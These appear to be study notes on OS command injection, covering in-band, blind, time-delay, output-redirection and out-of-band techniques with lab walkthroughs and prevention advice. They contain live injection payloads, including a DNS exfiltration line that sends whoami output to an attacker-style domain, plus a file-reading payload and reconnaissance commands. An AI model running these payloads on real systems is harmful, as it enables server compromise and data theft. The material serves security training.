OS Command injection
Also known as shell injection.
It allows an attacker to execute OS commands on the server running an application.
It can compromise the application and its data.
An attacker can leverage OS command injection to compromise other parts of the hosting infrastructure.
An attacker can exploit trust relationships to pivot to other systems within the organization.
Injecting OS commands
Example: A shopping application lets the user view whether an item is in stock in a particular store.
The URL to access this information:
https://insecure-website.com/stockStatus?productID=381&storeID=29The application must query various legacy systems to provide the stock.
To achieve this, it uses a shell command to call out the product and store ID as arguments on the system:
stockreport.pl 381 29This command outputs the stock status for the specified item, which is returned to the user.
If the application has no filters against OS command injection, an attacker can submit the input below to execute an arbitrary command:
& echo givemecheese &The input is submitted in the productID parameter and executed by the application:
stockreport.pl & echo givemecheese & 29The echo command causes the supplied string to be echoed in the output. This is how we can test for some types of OS command injection. The & character is a shell command separator: it causes three separate commands to execute, one after another.
Example output:
The three lines of the output demonstrate:
The original
stockreport.plcommand was executed without its expected argument and so returned an error message.The injected
echocommand was executed, and the supplied string was echoed in the output.The original argument
29was executed as a command, which caused the error.
Placing the additional command separator & after the injected command is useful: it separates the injected command from whatever follows the injection point. This reduces the chance that what follows will prevent the injected command from executing.
Labs: OS command injection (simple case)
Analysis
The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.
Use Burp Suite to intercept the request that checks the stock level.
Click on the check stock and view the history in Burp Suite.
Send the request to Repeater and test the product parameter with
& echo givemecheese. A 200 response with the echoed string indicates injection.URL-encode the command (e.g.,
& whoamiencoded) before sending to the backend.The command output is displayed, confirming the vulnerability.
From the result you can run another command to read files, e.g.
& cat /home/peter-tkbRC6/stockreport.sh(URL-encode).You can add
#to comment out the rest of the original command if needed (URL-encode).Modify the
storeIDparameter to include the injection and send the request; observe the response.
Useful commands
Execute some initial commands to obtain information about the system
Name of current user
whoami
whoami
Operating system
uname -a
ver
Network configuration
ifconfig
ipconfig /all
Network connections
netstat -an
netstat -an
Running processes
ps -ef
tasklist
Blind OS command injection vulnerabilities
This means the application doesn't return the output from the command within its HTTP response.
Different techniques are required.
Example: A website submits feedback to a site administrator. The server-side application calls the mail program with submitted details:
The output from the
mailcommand is not returned in the application's responses. Usingechowon't work in this situation.Other techniques are required to detect and exploit the vulnerability.
Detecting blind OS command injection using time delays
Inject a command that triggers a time delay, and confirm execution based on how long the response takes.
The
pingcommand is a common choice; you can specify the number of ICMP packets to send to control the duration:
This causes the application to ping its loopback adapter for 10 seconds.
Lab: Blind OS command injection with time delays
Analysis
Use Burp Suite to intercept the feedback submission request.
Test parameters with the
sleeporpingpayload, e.g. in the name parameter try& sleep 10and use#to comment out the rest (URL-encode).If it doesn't delay, try another parameter.
If it delays, that's the vulnerable parameter to test further.
Example encoded payload for the email parameter:
Observe the response takes 10 seconds to return.
Exploiting blind OS command injection by redirecting output
You can redirect the output from the injected command into a file within the web root, then use the browser to retrieve it.
Example (redirecting output to a file the web server serves):
The
>character sends the output fromwhoamito the specified file. Then retrieve:
Lab: Blind OS command injection with output redirection
Analysis
Confirm which parameter is vulnerable to blind command injection using a sleep payload.
Identify where images are stored (e.g.,
/var/www/images/).Redirect output to a file in that folder.
Example payload (URL-encode):
Modify the image filename parameter to request
output.txtand observe the response containing the injected command output.
Exploiting blind OS command injection using out-of-band (OAST) techniques
Injected commands can trigger out-of-band network interactions to systems you control.
Example:
This uses
nslookupto cause a DNS lookup for the specified domain. Monitor your controlled server (or Burp Collaborator) to see if the lookup happens.
Lab: Blind OS command injection with out-of-band interaction
Analysis
Use Burp Suite to intercept and modify feedback requests.
Identify the vulnerable parameter (e.g., Email) via a
sleeptest.If local file writes are not possible, trigger an out-of-band interaction with an external domain.
Example payload (URL-encode appropriately):
Use Burp Collaborator (or another OAST service) to monitor for DNS lookups or other interactions.
How to exfiltrate command output via DNS
Out-of-band channels provide an easy way to exfiltrate command output:
This causes a DNS lookup for a domain that includes the result of
whoami, allowing the attacker to receive the output in a DNS query (e.g.,www.user.kgji2ohoyw.web-attacker.com).
Lab: Blind OS command injection with out-of-band data exfiltration
Vulnerability
A blind OS command injection vulnerability in the feedback function.
End-goal
Exfiltrate command output via a DNS query to an attacker-controlled domain (e.g., Burp Collaborator).
Analysis
Use Burp Suite to intercept and modify feedback requests.
Identify the vulnerable parameter via a
sleeptest.If local writes are not writable, trigger an out-of-band interaction.
Example pattern:
Monitor the out-of-band service for inbound DNS lookups containing the command output.
Payload
& nslookup \whoami`.kgji2ohoyw.web-attacker.com &` (URL-encode before sending) {% endstep %} {% endstepper %}
Ways of injecting OS commands
There are a number of shell metacharacters that allow commands to be chained. Separators that work both on Windows and Linux:
Separators for Unix-based systems:
Unix-based systems also use inline execution:
Different shell metacharacters behave subtly differently. Some can be used for in-band retrieval or blind exploitation.
If the input you control appears within quotation marks in the original command, you need to terminate the quoted context using " or ' before using suitable shell metacharacters to inject a new command.
How to prevent OS command injection
Never call out OS commands from application-layer code when avoidable.
Use safer platform APIs.
If you must call commands, apply strong input validation:
Validate against a whitelist of permitted values.
Validate that the input is a number when expected.
Validate that input contains only allowed characters (e.g., alphanumeric), with no other syntax or whitespace.
Do not rely on attempting to sanitize input by escaping shell metacharacters; prefer whitelist validation and safe APIs.